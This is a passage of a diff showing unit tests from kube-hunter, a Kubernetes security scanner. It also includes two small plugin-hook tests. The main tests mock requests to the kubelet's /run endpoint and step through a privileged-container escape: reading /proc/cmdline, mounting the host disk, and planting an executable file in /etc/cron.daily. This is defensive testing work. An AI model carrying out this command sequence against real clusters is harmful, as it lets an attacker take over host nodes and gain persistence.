|
||||
file_name,
|
||||
)
|
||||
|
||||
assert return_value["result"] is False
|
||||
|
||||
|
||||
def test_check_directory_exists_existing_directory():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="mock.txt")
|
||||
|
||||
return_value = class_being_tested.check_directory_exists(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "Mock"
|
||||
)
|
||||
|
||||
assert return_value is True
|
||||
|
||||
|
||||
def test_check_directory_exists_non_existent_directory():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="ls: Mock: No such file or directory")
|
||||
|
||||
return_value = class_being_tested.check_directory_exists(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "Mock"
|
||||
)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
rmdir_command_removed_successfully_callback_counter = 0
|
||||
|
||||
|
||||
def rmdir_command_removed_successfully_callback(request, context):
|
||||
global rmdir_command_removed_successfully_callback_counter
|
||||
|
||||
if rmdir_command_removed_successfully_callback_counter == 0:
|
||||
rmdir_command_removed_successfully_callback_counter += 1
|
||||
return "mock.txt"
|
||||
else:
|
||||
return "ls: Mock: No such file or directory"
|
||||
|
||||
|
||||
def test_rmdir_command_removed_successfully():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("ls Mock", safe=""), text=rmdir_command_removed_successfully_callback
|
||||
)
|
||||
session_mock.post(run_url + urllib.parse.quote("rmdir Mock", safe=""), text="")
|
||||
|
||||
return_value = class_being_tested.rmdir_command(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
"Mock",
|
||||
number_of_rmdir_attempts=1,
|
||||
seconds_to_wait_for_os_command=None,
|
||||
)
|
||||
|
||||
assert return_value is True
|
||||
|
||||
|
||||
def test_rmdir_command_removed_failed():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="mock.txt")
|
||||
session_mock.post(run_url + urllib.parse.quote("rmdir Mock", safe=""), text="Permission denied")
|
||||
|
||||
return_value = class_being_tested.rmdir_command(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
"Mock",
|
||||
number_of_rmdir_attempts=1,
|
||||
seconds_to_wait_for_os_command=None,
|
||||
)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
def test_get_root_values_success():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
root_value, root_value_type = class_being_tested.get_root_values(cat_proc_cmdline)
|
||||
|
||||
assert root_value == "Mock" and root_value_type == "LABEL="
|
||||
|
||||
|
||||
def test_get_root_values_failure():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
root_value, root_value_type = class_being_tested.get_root_values("")
|
||||
|
||||
assert root_value is None and root_value_type is None
|
||||
|
||||
|
||||
def test_process_exposed_existing_privileged_container_success():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
|
||||
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
|
||||
session_mock.post(run_url + urllib.parse.quote(f"mkdir {directory_created}", safe=""), text="")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text=""
|
||||
)
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote(f"cat {directory_created}/etc/hostname", safe=""), text="mockhostname"
|
||||
)
|
||||
|
||||
return_value = class_being_tested.process_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
None,
|
||||
directory_created,
|
||||
)
|
||||
|
||||
assert return_value["result"] is True
|
||||
|
||||
|
||||
def test_process_exposed_existing_privileged_container_failure_when_cat_cmdline():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text="Permission denied")
|
||||
|
||||
return_value = class_being_tested.process_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
None,
|
||||
directory_created,
|
||||
)
|
||||
|
||||
assert return_value["result"] is False
|
||||
|
||||
|
||||
def test_process_exposed_existing_privileged_container_failure_when_findfs():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
|
||||
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="Permission denied")
|
||||
|
||||
return_value = class_being_tested.process_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
None,
|
||||
directory_created,
|
||||
)
|
||||
|
||||
assert return_value["result"] is False
|
||||
|
||||
|
||||
def test_process_exposed_existing_privileged_container_failure_when_mkdir():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
|
||||
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
|
||||
session_mock.post(run_url + urllib.parse.quote(f"mkdir {directory_created}", safe=""), text="Permission denied")
|
||||
|
||||
return_value = class_being_tested.process_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
None,
|
||||
directory_created,
|
||||
)
|
||||
|
||||
assert return_value["result"] is False
|
||||
|
||||
|
||||
def test_process_exposed_existing_privileged_container_failure_when_mount():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
|
||||
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
|
||||
session_mock.post(run_url + urllib.parse.quote(f"mkdir {directory_created}", safe=""), text="")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""),
|
||||
text="Permission denied",
|
||||
)
|
||||
|
||||
return_value = class_being_tested.process_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
None,
|
||||
directory_created,
|
||||
)
|
||||
|
||||
assert return_value["result"] is False
|
||||
|
||||
|
||||
def test_process_exposed_existing_privileged_container_failure_when_cat_hostname():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
|
||||
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
|
||||
session_mock.post(run_url + urllib.parse.quote(f"mkdir {directory_created}", safe=""), text="")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text=""
|
||||
)
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote(f"cat {directory_created}/etc/hostname", safe=""),
|
||||
text="Permission denied",
|
||||
)
|
||||
|
||||
return_value = class_being_tested.process_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
None,
|
||||
directory_created,
|
||||
)
|
||||
|
||||
assert return_value["result"] is False
|
||||
|
||||
|
||||
def test_maliciousintentviasecurekubeletport_success():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
file_name = "kube-hunter-mock" + str(uuid.uuid1())
|
||||
file_name_with_path = f"{directory_created}/etc/cron.daily/{file_name}"
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
|
||||
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
|
||||
session_mock.post(run_url + urllib.parse.quote(f"mkdir {directory_created}", safe=""), text="")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text=""
|
||||
)
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote(f"cat {directory_created}/etc/hostname", safe=""), text="mockhostname"
|
||||
)
|
||||
session_mock.post(run_url + urllib.parse.quote(f"touch {file_name_with_path}", safe=""), text="")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""), text=""
|
||||
)
|
||||
|
||||
class_being_tested.execute(directory_created, file_name)
|
||||
|
||||
message = "The following exposed existing privileged containers have been successfully"
|
||||
message += " abused by starting/modifying a process in the host."
|
||||
|
||||
assert message in class_being_tested.event.evidence
|
||||
13
tests/plugins/test_hooks.py
Normal file
13
tests/plugins/test_hooks.py
Normal file
@@ -0,0 +1,13 @@
|
||||
from kube_hunter.plugins import hookimpl
|
||||
|
||||
return_string = "return_string"
|
||||
|
||||
|
||||
@hookimpl
|
||||
def parser_add_arguments(parser):
|
||||
return return_string
|
||||
|
||||
|
||||
@hookimpl
|
||||
def load_plugin(args):
|
||||
return return_string
|
||||
17
tests/plugins/test_plugins_hooks.py
Normal file
17
tests/plugins/test_plugins_hooks.py
Normal file
@@ -0,0 +1,17 @@
|
||||
from argparse import ArgumentParser
|
||||
from tests.plugins import test_hooks
|
||||
from kube_hunter.plugins import initialize_plugin_manager
|
||||
|
||||
|
||||
def test_all_plugin_hooks():
|
||||
pm = initialize_plugin_manager()
|
||||
pm.register(test_hooks)
|
||||
|
||||
# Testing parser_add_arguments
|
||||
parser = ArgumentParser("Test Argument Parser")
|
||||
results = pm.hook.parser_add_arguments(parser=parser)
|
||||
assert test_hooks.return_string in results
|
||||
|
||||
# Testing load_plugin
|
||||
results = pm.hook.load_plugin(args=[])
|
||||
assert test_hooks.return_string in results
|
||||
Reference in New Issue
Block a user